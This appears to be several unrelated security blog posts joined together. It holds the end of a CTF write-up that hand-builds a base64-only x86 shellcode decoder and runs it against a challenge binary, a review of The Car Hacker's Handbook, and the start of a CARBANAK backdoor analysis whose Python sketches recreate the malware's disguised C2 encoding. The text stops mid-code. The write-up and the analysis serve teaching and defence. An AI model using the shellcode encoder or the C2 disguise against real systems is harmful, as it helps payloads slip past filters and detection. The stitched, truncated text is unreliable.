First, let's set edx to the highest value we can, 0x7F (we choose edx because a) it's one of the three registers we can easily pop into; b) eax is our working variable since it's the only one we can xor; and c) we don't want to change ecx once we start going, since it points to the memory we're decoding):

irb(main):057:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x0000007F)
0x41414146 ^ 0x41414139
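(get_xor_values_32() is my Ruby helper; if you'd rather follow along in Python, here's a minimal re-implementation of the idea. Note that a byte with its MSB set has no valid pair, since xoring two 7-bit alphabet bytes can never set the top bit; that's the whole reason this section exists.)

```python
ALPHABET = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

def xor_pair_byte(b):
    """Find two base64-alphabet bytes whose xor equals b."""
    for c1 in ALPHABET:
        if c1 ^ b in ALPHABET:
            return c1, c1 ^ b
    raise ValueError("no base64 xor pair for byte %#04x" % b)

def get_xor_values_32(value):
    a = b = 0
    for i in range(4):                        # decompose one byte at a time
        c1, c2 = xor_pair_byte((value >> (8 * i)) & 0xFF)
        a |= c1 << (8 * i)
        b |= c2 << (8 * i)
    return a, b

print("0x%08x ^ 0x%08x" % get_xor_values_32(0x0000007F))  # 0x41414146 ^ 0x41414139
```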

Using those values and our old push / pop / xor pattern, we can set edx to 0x80:

push 0x41414146
pop eax
xor eax, 0x41414139 ; eax -> 0x7F
push eax
pop edx ; edx -> 0x7F

; Now that edx is 0x7F, we can simply increment it
inc edx ; edx -> 0x80

That works out to:

00000000  68 46 41 41 41 58 35 39  41 41 41 50 5a 42        |hFAAAX59AAAPZB|

So far so good! Now we can do our usual xor to set that one bit in our decoded code:

xor [ecx+0x41], edx

This sets the MSB of whatever ecx+0x41 (our current instruction) is.

If we were decoding a single bit at a time, we'd be done. Unfortunately, we aren't so lucky - we're working in 32-bit (4-byte) chunks.

Setting edx to 0x00008000, 0x00800000, or 0x80000000

So how do we set edx to 0x00008000, 0x00800000, or 0x80000000 without having a shift instruction?

This is where I introduce a pretty ugly hack. In effect, we use some stack shenanigans to perform a poor-man's shift. This won't work on most non-x86/x64 systems, because they require a word-aligned stack (I was actually a little surprised it worked on x86, to be honest!).

Let's say we want 0x00008000. Let's just look at the code:

; Set all registers to 0 so we start with a clean slate, using the popad strategy from earlier (we need a register that's reliably 0)
push 0x41414141
pop eax
xor eax, 0x41414141
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax

; Set edx to 0x00000080, just like before
push 0x41414146
pop eax
xor eax, 0x41414139 ; eax -> 0x7F
push eax
pop edx ; edx -> 0x7F
inc edx ; edx -> 0x80

; Push edi (which, like all registers, is 0) onto the stack
push edi ; 0x00000000

; Push edx onto the stack
push edx

; Move esp by 1 byte - note that this won't work on many architectures, but x86/x64 are fine with a misaligned stack
dec esp

; Get edx back, shifted by one byte
pop edx

; Fix the stack (not really necessary, but it's nice to do it)
inc esp

; Add a debug breakpoint so we can inspect the value
int 3

And we can use gdb to prove it works with the same trick as before:

$ nasm -o file file.asm
$ rm -f core
$ ulimit -c unlimited
$ ./run_raw_code ./file
allocated 41 bytes of executable memory at: 0x41410000
fish: “~/projects/ctf-2017-release/for...” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ./run_raw_code ./core
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410029 in ?? ()
(gdb) print/x $edx
$1 = 0x8000

We can do basically the exact same thing to set the third byte:

push edi ; 0x00000000
push edx
dec esp
dec esp ; <-- New
pop edx
inc esp
inc esp ; <-- New

And the fourth:

push edi ; 0x00000000
push edx
dec esp
dec esp
dec esp ; <-- New
pop edx
inc esp
inc esp
inc esp ; <-- New
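If you want to convince yourself the trick works without firing up gdb every time, here's a rough Python simulation of the misaligned push / pop shuffle (it assumes the byte just below the stack top is zero, which held true for us; on a real stack you're trusting whatever happens to be there):

```python
import struct

mem = bytearray(64)   # pretend stack, zero-filled (like after our zeroing pushes)
esp = len(mem)

def push(value):
    global esp
    esp -= 4
    mem[esp:esp + 4] = struct.pack("<I", value)

def pop():
    global esp
    value, = struct.unpack("<I", bytes(mem[esp:esp + 4]))
    esp += 4
    return value

def shift_left_bytes(value, n):
    """Simulate: push 0; push value; dec esp n times; pop; inc esp n times."""
    global esp
    push(0)          # push edi (always zero here)
    push(value)      # push edx
    esp -= n         # dec esp: misalign the stack pointer by n bytes
    result = pop()   # pop edx: re-read the dword, shifted down n bytes
    esp += n         # inc esp: fix the stack
    esp += 4         # drop the leftover zero dword
    return result

print(hex(shift_left_bytes(0x80, 1)))  # 0x8000
```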

Putting it all together

You can take a look at how I do this in my final code. It's going to be a little different, because instead of using our xor trick to set edx to 0x7F, I instead push 0x7a / pop edx / increment 6 times. The only reason is that I didn't think of the xor trick when I was writing the original code, and I don't want to mess with it now.

But, we're going to do it the hard way: by hand! I'm literally writing this code as I write the blog (and, message from the future: it worked on the second try :) ).

Let's just stick with our simple exit-with-0x41414141-status shellcode:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Which assembles to this, which is conveniently already a multiple of 4 bytes so no padding required:

00000000  b8 01 00 00 00 bb 41 41  41 41 cd 80              |......AAAA..|

Since we're doing it by hand, let's extract all the MSBs into a separate string (remember, this is all done programmatically usually):

00000000  38 01 00 00 00 3b 41 41  41 41 4d 00              |8....;AAAAM.|
00000000  80 00 00 00 00 80 00 00  00 00 80 80              |............|

If you xor those two strings together, you'll get the original string back.
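That claim is easy to check in Python (another throwaway sanity check):

```python
original = bytes.fromhex("b801000000bb41414141cd80")  # mov eax, 1 / mov ebx, 0x41414141 / int 0x80
msb_free = bytes.fromhex("38010000003b414141414d00")  # MSBs stripped
msb_only = bytes.fromhex("800000000080000000008080")  # just the MSBs

# xoring the two strings byte-by-byte recovers the original shellcode
assert bytes(a ^ b for a, b in zip(msb_free, msb_only)) == original
print("ok")
```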

First, let's worry about the first string. It's handled exactly the way we did the last example. We start by getting the three 32-bit values as little endian values:

  • 38 01 00 00 -> 0x00000138
  • 00 3b 41 41 -> 0x41413b00
  • 41 41 4d 00 -> 0x004d4141

And then find the xor pairs to generate them just like before:

irb(main):061:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x00000138)
0x41414241 ^ 0x41414379

irb(main):062:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x41413b00)
0x6a6a4141 ^ 0x2b2b7a41

irb(main):063:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x004d4141)
0x41626a6a ^ 0x412f2b2b

But here's where the twist comes: let's take the MSB string above, and also convert that to little-endian integers:

  • 80 00 00 00 -> 0x00000080
  • 00 80 00 00 -> 0x00008000
  • 00 00 80 80 -> 0x80800000

Now, let's try writing our decoder stub just like before, except that after decoding the MSB-free value, we're going to separately inject the MSBs into the code!

; Set all registers to 0 so we start with a clean slate, using the popad strategy from earlier
push 0x41414141
pop eax
xor eax, 0x41414141
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax

; Set ecx to 0x41410100 (0x41 bytes less than the start of the encoded data)
push 0x6a6a4241
pop eax
xor eax, 0x2b2b4341 ; 0x41410100
push eax
pop ecx

; xor the first pair
push 0x41414241
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x00000080, so let's load it into edx
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
xor [ecx+0x41], edx

; Move to the next value
inc ecx
inc ecx
inc ecx
inc ecx

; xor the second pair
push 0x6a6a4141
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x00008000
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080

push edi ; 0x00000000
push edx
dec esp
pop edx ; edx is now 0x00008000
inc esp
xor [ecx+0x41], edx

; Move to the next value
inc ecx
inc ecx
inc ecx
inc ecx

; xor the third pair
push 0x41626a6a
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x80800000; we'll do it in two operations, with 0x00800000 first
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
push edi ; 0x00000000
push edx
dec esp
dec esp
pop edx ; edx is now 0x00800000
inc esp
inc esp
xor [ecx+0x41], edx

; And then the 0x80000000
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
push edi ; 0x00000000
push edx
dec esp
dec esp
dec esp
pop edx ; edx is now 0x80000000
inc esp
inc esp
inc esp
xor [ecx+0x41], edx

; Padding (calculated based on the length above, subtracted from 0x141)

; The second halves of the pairs (ie, the encoded data; this is where the decoded data will end up by the time execution gets here)
dd 0x41414379
dd 0x2b2b7a41
dd 0x412f2b2b

And that's it! Let's try it out! The code leading up to the padding assembles to:

00000000  68 41 41 41 41 58 35 41  41 41 41 50 50 50 50 50  |hAAAAX5AAAAPPPPP|
00000010  50 50 50 61 68 41 42 6a  6a 58 35 41 43 2b 2b 50  |PPPahABjjX5AC++P|
00000020  59 68 41 42 41 41 5a 31  51 41 68 46 41 41 41 58  |YhABAAZ1QAhFAAAX|
00000030  35 39 41 41 41 50 5a 42  31 51 41 41 41 41 41 68  |59AAAPZB1QAAAAAh|
00000040  41 41 6a 6a 5a 31 51 41  68 46 41 41 41 58 35 39  |AAjjZ1QAhFAAAX59|
00000050  41 41 41 50 5a 42 57 52  4c 5a 44 31 51 41 41 41  |AAAPZBWRLZD1QAAA|
00000060  41 41 68 6a 6a 62 41 5a  31 51 41 68 46 41 41 41  |AAhjjbAZ1QAhFAAA|
00000070  58 35 39 41 41 41 50 5a  42 57 52 4c 4c 5a 44 44  |X59AAAPZBWRLLZDD|
00000080  31 51 41 68 46 41 41 41  58 35 39 41 41 41 50 5a  |1QAhFAAAX59AAAPZ|
00000090  42 57 52 4c 4c 4c 5a 44  44 44 31 51 41           |BWRLLLZDDD1QA|

We can verify it's all base64 by eyeballing it. We can also determine that it's 0x9d bytes long, which means to get to 0x141 we need to pad it with 0xa4 bytes (already included above) before the encoded data.

We can dump allll that code into a file, and run it with run_raw_code (don't forget to apply the patch from earlier to change the base address to 0x41410000, and don't forget to compile with -m32 for 32-bit mode):

$ nasm -o file file.asm
$ strace ./run_raw_code ./file
read(3, "hAAAAX5AAAAPPPPPPPPahABjjX5AC++P"..., 333) = 333
exit(1094795585)                        = ?
+++ exited with 65 +++

It works! And it only took me two tries (I missed the 'inc ecx' lines the first time :) ).

I realize that it's a bit inefficient to encode 3 lines into like 100, but that's the cost of having a limited character set!

Solving the level

Bringing it back to the actual challenge...

Now that we have working base64 code, the rest is pretty simple. Since the app base64-encodes our input for us, we have to take the base64 string we want and decode it first, to get the input that will encode back to it.

Because base64 works in blocks and has padding, we're going to append a few meaningless bytes to the end, so that if a partial final block gets mangled, it's only the padding that suffers.

Here's the full "exploit", assembled:


We're going to add a few 'A's to the end for padding (the character we choose is meaningless), and run it through base64 -d (adding '='s to the end until we stop getting decoding errors):

00000000  84 00 00 01 7e 40 00 00  0f 3c f3 cf 3c f3 da 84  |....~@...<..<...|
00000010  00 63 8d 7e 40 0b ef 8f  62 10 01 00 06 75 40 08  |.c.~@...b....u@.|
00000020  45 00 00 17 e7 d0 00 00  f6 41 d5 00 00 00 00 21  |E........A.....!|
00000030  00 08 e3 67 54 00 84 50  00 01 7e 7d 00 00 0f 64  |...gT..P..~}...d|
00000040  15 91 2d 90 f5 40 00 00  00 08 63 8d b0 19 d5 00  |..-..@....c.....|
00000050  21 14 00 00 5f 9f 40 00  03 d9 05 64 4b 2d 90 c3  |!..._.@....dK-..|
00000060  d5 00 21 14 00 00 5f 9f  40 00 03 d9 05 64 4b 2c  |..!..._.@....dK,|
00000070  b6 43 0c 3d 50 00 00 00  00 00 00 00 00 00 00 00  |.C.=P...........|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000000f0  03 20 80 00 0c fe fb ef  bf 00 00 00 00 00        |. ............|

Let's convert that into a string that we can use on the commandline by chaining together a bunch of shell commands:


And, finally, feed all that into b-64-b-tuff:

$ echo -ne '\x84\x00\x00\x01\x7e\x40\x00\x00\x0f\x3c\xf3\xcf\x3c\xf3\xda\x84\x00\x63\x8d\x7e\x40\x0b\xef\x8f\x62\x10\x01\x00\x06\x75\x40\x08\x45\x00\x00\x17\xe7\xd0\x00\x00\xf6\x41\xd5\x00\x00\x00\x00\x21\x00\x08\xe3\x67\x54\x00\x84\x50\x00\x01\x7e\x7d\x00\x00\x0f\x64\x15\x91\x2d\x90\xf5\x40\x00\x00\x00\x08\x63\x8d\xb0\x19\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2d\x90\xc3\xd5\x00\x21\x14\x00\x00\x5f\x9f\x40\x00\x03\xd9\x05\x64\x4b\x2c\xb6\x43\x0c\x3d\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x80\x00\x0c\xfe\xfb\xef\xbf\x00\x00\x00\x00\x00' | strace ./b-64-b-tuff
read(0, "\204\0\0\1~@\0\0\17<\363\317<\363\332\204\0c\215~@\v\357\217b\20\1\0\6u@\10"..., 4096) = 254
write(1, "Read 254 bytes!\n", 16Read 254 bytes!
)       = 16
write(1, "\n", 1
)                       = 1
exit(1094795585)                        = ?
+++ exited with 65 +++

And, sure enough, it exited with the status that we wanted! Now that we've encoded 12 bytes of shellcode, we can encode any amount of arbitrary code that we choose to!


So that, ladies and gentlemen and everyone else, is how to encode some simple shellcode into base64 by hand. My solution does almost exactly those steps, but in an automated fashion. I also found a few shortcuts while writing the blog that aren't included in that code.

To summarize:

  • Pad the input to a multiple of 4 bytes
  • Break the input up into 4-byte blocks, and find an xor pair that generates each value
  • Set ecx to a value that's 0x41 bytes before the encoded payload, which is half of the xor pairs
  • Put the other halves of the xor pairs in-line, loaded into edx and xor'd with the encoded payload
  • If there are any MSB bits set, set edx to 0x80 and use the stack to shift them into the right place to be inserted with a xor
  • After all the xors, add padding that's base64-compatible, but is effectively a no-op, to bridge between the decoder and the encoded payload
  • End with the encoded stub (second half of the xor pairs)
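The encoding side of that summary (pad, split into dwords, find the pairs and the MSB masks) condenses to a short Python sketch; this is hypothetical illustration code, not my actual solution, which does the same work plus emitting the decoder stub itself:

```python
import struct

B64 = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

def encode_payload(payload: bytes):
    """Return ([xor pairs for the MSB-cleared dwords], [MSB mask per dword])."""
    payload += b"A" * (-len(payload) % 4)      # pad to a multiple of 4 bytes
    pairs, msb_masks = [], []
    for (dword,) in struct.iter_unpack("<I", payload):
        msb = dword & 0x80808080               # the bits the stack trick must set
        low = dword ^ msb                      # the rest is base64-encodable
        a = b = 0
        for i in range(4):
            byte = (low >> (8 * i)) & 0xFF
            c1 = next(c for c in B64 if c ^ byte in B64)
            a |= c1 << (8 * i)
            b |= (c1 ^ byte) << (8 * i)
        pairs.append((a, b))
        msb_masks.append(msb)
    return pairs, msb_masks

# our 12-byte exit-with-0x41414141 shellcode from above
pairs, masks = encode_payload(bytes.fromhex("b801000000bb41414141cd80"))
```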

When the code runs, it xors each pair, and writes it in-line to where the encoded value was. It sets the MSB bits as needed. The padding runs, which is an effective no-op, then finally the freshly decoded code runs.

It's complex, but hopefully this blog helps explain it!

Book review: The Car Hacker’s Handbook

So, this is going to be a bit of an unusual blog for me. I usually focus on technical stuff, exploitation, hacking, etc. But this post will be a mixture of a book review, some discussion on my security review process, and whatever asides fall out of my keyboard when I hit it for long enough. But, don't fear! I have a nice heavy technical blog ready to go for tomorrow!


Let's kick this off with some pointless backstory! Skip to the next <h1> heading if you don't care how this blog post came about. :)

So, a couple years ago, I thought I'd give Audible a try, and read (err, listen to) some Audiobooks. I was driving from LA to San Francisco, and picked up a fiction book (one of Terry Pratchett's books in the Tiffany Aching series). I hated it (the audio experience), but left Audible installed and my account active.

A few months ago, on a whim, I figured I'd try a non-fiction book. I picked up NOFX's book, "The Hepatitis Bathtub and Other Stories". It was read by the band members and it was super enjoyable to listen while walking and exercising! And, it turns out, Audible had been giving me credits for some reason, and I have like 15 free books or something that I've been consuming like crazy.

Since my real-life friends are sick of listening to me talk about all the books I'm reading, I started amusing myself by posting mini-reviews on Facebook, which got some good feedback.

That got me thinking: writing book reviews is kinda fun!

Then a few days ago, I was talking to a publisher friend at Rocky Mountain Books, and he mentioned that there's a reviewer they'd sent a bunch of books to who never wrote any reviews. My natural thought was, "wow, what a jerk!".

Then I remembered: I'd promised No Starch that I'd write about The Car Hacker's Handbook like two years ago, and totally forgot. Am I the evil scientist jerk?

So now, after re-reading the book, you get to hear my opinions. :)

Threat Models

I've never really written about a technical book before, at least, not to a technical audience. So bear with this stream-of-consciousness style. :)

I think my favourite part of the book is the layout. When writing a book about car hacking to a technical audience, there's always a temptation to start with the "cool stuff" - protocols, exploits, stuff like that. It's also easy to forget about the varied level of your audience, and to assume knowledge. Since I have absolutely zero knowledge about car hacking (or cars, for that matter; my proudest accomplishment is filling the washer fluid by the third try and pulling up to the correct side of the gas pumps), I was a little worried.

At my current job (and previous one), I do product security reviews. I go through the cycle of: "here's something you've never seen before: ramp up, become an expert, and give us good advice. You have one week". If you ever have to do this, here's my best advice: just ask the engineers where they think the security problems are. In 5 minutes of casual conversation, you can find all the problems in a system and look like a hero. I love engineers. :)

But what happens when the engineers don't have security experience, or take an adversarial approach? Or when you want a more thorough / complete review?

That's how I learned to make threat models! Threat models are simply a way to discover the "attack surface", which is where you need to focus your attention as a reviewer (or developer). If you Google the term, you'll find lots of technical information on the "right way" to make a threat model. You might hear about STRIDE (spoofing/tampering/repudiation/information disclosure/denial of service/escalation of privileges). When I tried to use that, I tended to always get stuck on the same question: "what the heck IS 'repudiation', anyways?".

But yeah, that doesn't really matter. I use STRIDE to help me come up with questions and scenarios, but I don't do anything more formal than that.

If you are approaching a new system, and you want a threat model, here's what you do: figure out (or ask) what the pieces are, and how they fit together. The pieces could be servers, processes, data levels, anything like that; basically, things with a different "trust level", or things that shouldn't have full unfettered access to each other (read, or write, or both).

Once you have all that figured out, look at each piece and each connection between pairs of pieces and try to think of what can go wrong. Is plaintext data passing through an insecure medium? Is the user authentication/authorization happening in the right place? Is the traffic all repudiatable (once we figure out what that means)? Can data be forged? Or changed?

It doesn't have to be hard. It doesn't have to match any particular standard. Just figure out what the pieces are and where things can go wrong. If you start there, the rest of a security review is much, much easier for both you and the engineers you're working with. And speaking of the engineers: it's almost always worth the time to work together with engineers to develop a threat model, because they'll remember it next time.

Anyway, getting back to the point: that's the exact starting point that the Car Hacker's Handbook takes! The very first chapter is called "Understanding Threat Models". It opens by taking a "bird's eye view" of a car's systems, and talking about the big pieces: the cellular receiver, the Bluetooth, the wifi, the "infotainment" console, and so on. All these pieces that I was vaguely aware of in my car, but didn't really know the specifics of.

It then breaks them down into the protocols they use, what the range is, and how they're parsed. For example, the Bluetooth is "near range", and is often handled by "Bluez". USB is, obviously, a cable connection, and is typically handled by udev in the kernel. And so on.

Then they look at the potential threats: remotely taking over a vehicle, unlocking it, stealing it, tracking it, and so on.

For every protocol, it looks at every potential threat and how it might be affected.

This is the perfect place to start! The authors made the right choice, no doubt about it!

(Sidenote: because the rule of comedy is that 3 references to something is funnier than 2, and I couldn't find a logical third place to mention it, I just want to say "repudiation" again.)


If you read my blog regularly, you know that I love protocols. The reason I got into information security in the first place was by reverse engineering Starcraft's game protocol and implementing and documenting it (others had reversed it before, but nobody had published the information).

So I found the section on protocols intriguing! It's not like the olden days, when every protocol was custom and proprietary and weird: most of the protocols are well documented, and it just requires the right hardware to interface with it.

I don't want to dwell on this too much, but the book spends a TON of time talking about how to find physical ports, sniff protocols, understand what you're seeing, and figure out how to do things like unlock your doors in a logical, step-by-step manner. These protocols are all new to me, but I loved the logical approach that they took throughout the protocol chapters. For somebody like me, having no experience with car hacking or even embedded systems, it was super easy to follow and super informative!

It's good enough that I wanted to buy a new car just so I could hack it. Unfortunately, my accountant didn't think I'd be able to write it off as a business expense. :(


After going over the protocols, the book moves to attacks. I had just taken a really good class on hardware exploitation, and many of the same principles applied: dumping firmware, reverse engineering it, and exploring the attack surfaces.

Not being a hardware guy, I don't really want to attempt to reproduce this part in any great detail. It goes into a ton of detail on building out a lab, exploring attack surfaces (like the "infotainment" system, vehicle-to-vehicle communication, and even using SDR (software defined radio) to eavesdrop and inject into the wireless communication streams).


So yeah, this book is definitely well worth the read!

The progression is logical, and it's an incredible introduction, even for somebody with absolutely no knowledge of cars or embedded systems!

Also: I'd love to hear feedback on this post! I'm always looking for new things to write about, and if people legitimately enjoy hearing about the books I read, I'll definitely do more of this!

Behind the CARBANAK Backdoor

In this blog, we will take a closer look at the powerful, versatile backdoor known as CARBANAK (aka Anunak). Specifically, we will focus on the operational details of its use over the past few years, including its configuration, the minor variations observed from sample to sample, and its evolution. With these details, we will then draw some conclusions about the operators of CARBANAK. For some additional background on the CARBANAK backdoor, see the papers by Kaspersky and Group-IB and Fox-It.

Technical Analysis

Before we dive into the meat of this blog, a brief technical analysis of the backdoor is necessary to provide some context. CARBANAK is a full-featured backdoor with data-stealing capabilities and a plugin architecture. Some of its capabilities include key logging, desktop video capture, VNC, HTTP form grabbing, file system management, file transfer, TCP tunneling, HTTP proxy, OS destruction, POS and Outlook data theft and reverse shell. Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time.

Monitoring Threads

The backdoor may optionally start one or more threads that perform continuous monitoring for various purposes, as described in Table 1.  

  • Key logger: Logs key strokes for configured processes and sends them to the command and control (C2) server
  • Form grabber: Monitors HTTP traffic for form data and sends it to the C2 server
  • POS monitor: Monitors for changes to logs stored in C:\NSB\Coalition\Logs and nsb.pos.client.log and sends parsed data to the C2 server
  • PST monitor: Searches recursively for newly created Outlook personal storage table (PST) files within user directories and sends them to the C2 server
  • HTTP proxy monitor: Monitors HTTP traffic for requests sent to HTTP proxies, saves the proxy address and credentials for future use

Table 1: Monitoring threads


In addition to its file management capabilities, this data-stealing backdoor supports 34 commands that can be received from the C2 server. After decryption, these 34 commands are plain text with parameters that are space delimited much like a command line. The command and parameter names are hashed before being compared by the binary, making it difficult to recover the original names of commands and parameters. Table 2 lists these commands.

  • Runs each command specified in the configuration file (see the Configuration section)
  • Updates the state value (see the Configuration section)
  • Desktop video recording
  • Downloads executable and injects it into a new process
  • Ammyy Admin tool
  • Updates self
  • Add/Update klgconfig (analysis incomplete)
  • Starts HTTP proxy
  • Renders computer unbootable by wiping the MBR
  • Reboots the operating system
  • Creates a network tunnel
  • Adds new C2 server or proxy address for pseudo-HTTP protocol
  • Adds new C2 server for custom binary protocol
  • Creates or deletes Windows user account
  • Enables concurrent RDP (analysis incomplete)
  • Adds Notification Package (analysis incomplete)
  • Deletes file or service
  • Adds command to the configuration file (see the Configuration section)
  • Downloads executable and injects it directly into a new process
  • Sends Windows account details to the C2 server
  • Takes a screenshot of the desktop and sends it to the C2 server
  • Backdoor sleeps until specified date
  • Uploads files to the C2 server
  • Runs VNC plugin
  • Runs specified executable file
  • Uninstalls backdoor
  • Returns list of running processes to the C2 server
  • Changes C2 protocol used by plugins
  • Downloads and executes shellcode from specified address
  • Terminates the first process found with the specified name
  • Initiates a reverse shell to the C2 server
  • Plugin control
  • Updates backdoor

Table 2: Supported Commands


A configuration file resides in a file under the backdoor’s installation directory with the .bin extension. It contains commands in the same form as those listed in Table 2 that are automatically executed by the backdoor when it is started. These commands are also executed when the loadconfig command is issued. This file can be likened to a startup script for the backdoor. The state command sets a global variable containing a series of Boolean values represented as ASCII values ‘0’ or ‘1’ and also adds itself to the configuration file. Some of these values indicate which C2 protocol to use, whether the backdoor has been installed, and whether the PST monitoring thread is running or not. Other than the state command, all commands in the configuration file are identified by their hash’s decimal value instead of their plain text name. Certain commands, when executed, add themselves to the configuration so they will persist across (or be part of) reboots. The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it.

Figure 1 and Figure 2 illustrate some sample decoded configuration files we have come across in our investigations.

Figure 1: Configuration file that adds new C2 server and forces the data-stealing backdoor to use it

Figure 2: Configuration file that adds TCP tunnels and records desktop video

Command and Control

CARBANAK communicates to its C2 servers via pseudo-HTTP or a custom binary protocol.

Pseudo-HTTP Protocol

Messages in the pseudo-HTTP protocol are delimited with the ‘|’ character. A message starts with a host ID composed by concatenating a hash of the computer’s hostname and MAC address with a string likely used as a campaign code. Once the message has been formatted, it is sandwiched between two additional fields of randomly generated strings of upper- and lower-case alphabetic characters. An example of a command polling message and a response to the listprocess command are given in Figure 3 and Figure 4, respectively.

Figure 3: Example command polling message

Figure 4: Example command response message
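As an illustration only, the sketch below assembles a polling message in the shape described above. The hash algorithm used to derive the host ID is not specified in this analysis, so CRC32 stands in for it here, and the field lengths are arbitrary assumptions.

```python
import random
import string
import zlib

def build_poll_message(hostname: str, mac: str, campaign: str) -> str:
    # Host ID: a hash of hostname + MAC concatenated with a campaign code
    # (CRC32 is a stand-in; the real hash algorithm is unspecified)
    host_id = f"{zlib.crc32((hostname + mac).encode()):08X}{campaign}"
    rand_field = lambda: ''.join(
        random.choices(string.ascii_letters, k=random.randint(4, 12)))
    # Sandwich the host ID between two random alphabetic fields,
    # delimiting the message with '|'
    return '|'.join([rand_field(), host_id, rand_field()])
```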

Messages are encrypted using Microsoft’s implementation of RC2 in CBC mode with PKCS#5 padding. The encrypted message is then Base64 encoded, replacing all the ‘/’ and ‘+’ characters with the ‘.’ and ‘-’ characters, respectively. The eight-byte initialization vector (IV) is a randomly generated string consisting of upper and lower case alphabet characters. It is prepended to the encrypted and encoded message.

The encoded payload is then made to look like a URI by having a random number of ‘/’ characters inserted at random locations within the encoded payload. The malware then appends a script extension (php, bml, or cgi) with a random number of random parameters or a file extension from the following list with no parameters: gif, jpg, png, htm, html, php.
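A minimal sketch of the encoding and URI-disguising steps just described, assuming the RC2 encryption has already produced the ciphertext; the function names and the query-string parameter names are invented for illustration.

```python
import base64
import random
import string

def encode_body(ciphertext: bytes) -> str:
    # Base64 encode, substituting '/' -> '.' and '+' -> '-'
    enc = base64.b64encode(ciphertext).decode()
    enc = enc.replace('/', '.').replace('+', '-')
    # Prepend the random eight-character alphabetic IV string
    iv = ''.join(random.choices(string.ascii_letters, k=8))
    return iv + enc

def disguise_as_uri(payload: str) -> str:
    # Insert '/' characters at random positions within the payload
    chars = list(payload)
    for _ in range(random.randint(1, 4)):
        chars.insert(random.randint(0, len(chars)), '/')
    # Append a script extension with random parameters
    ext = random.choice(['php', 'bml', 'cgi'])
    params = '&'.join(
        '{}={}'.format(''.join(random.choices(string.ascii_lowercase, k=3)),
                       random.randint(0, 99))
        for _ in range(random.randint(1, 3)))
    return '/' + ''.join(chars) + '.' + ext + '?' + params
```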

This URI is then used in a GET or POST request. The body of the POST request may contain files in the cabinet format. A sample GET request is shown in Figure 5.

Figure 5: Sample pseudo-HTTP beacon

The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command. The backdoor also searches for proxy configurations to use in the registry at HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings and for each profile in the Mozilla Firefox configuration file at %AppData%\Mozilla\Firefox\<ProfileName>\prefs.js.

Custom Binary Protocol

Figure 6 describes the structure of the malware’s custom binary protocol. If a message is larger than 150 bytes, it is compressed with an unidentified algorithm. If a message is larger than 4096 bytes, it is broken into compressed chunks. This protocol has undergone several changes over the years, each version building upon the previous version in some way. These changes were likely introduced to render existing network signatures ineffective and to make signature creation more difficult.

Figure 6: Binary protocol message format
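The size thresholds can be sketched as follows; zlib stands in for the unidentified compression algorithm, and this is only an approximation of the behavior described above.

```python
import zlib

COMPRESS_THRESHOLD = 150
CHUNK_SIZE = 4096

def prepare_message(msg: bytes) -> list:
    # Small messages pass through untouched; larger ones are compressed,
    # and anything over 4096 bytes is split into compressed chunks
    if len(msg) <= COMPRESS_THRESHOLD:
        return [msg]
    return [zlib.compress(msg[i:i + CHUNK_SIZE])
            for i in range(0, len(msg), CHUNK_SIZE)]
```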

Version 1

In the earliest version of the binary protocol, message bodies stored in the <chunkData> field are simply XORed with the host ID. The initial message is not encrypted and contains the host ID.

Version 2

Rather than using the host ID as the key, this version uses a random XOR key between 32 and 64 bytes in length that is generated for each session. This key is sent in the initial message.
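Versions 1 and 2 differ only in where the XOR key comes from (the host ID versus a random per-session key). A repeating-key XOR, sketched below, is its own inverse, so the same routine encrypts and decrypts; the key generation follows the 32 to 64 byte range described above.

```python
import os
import random

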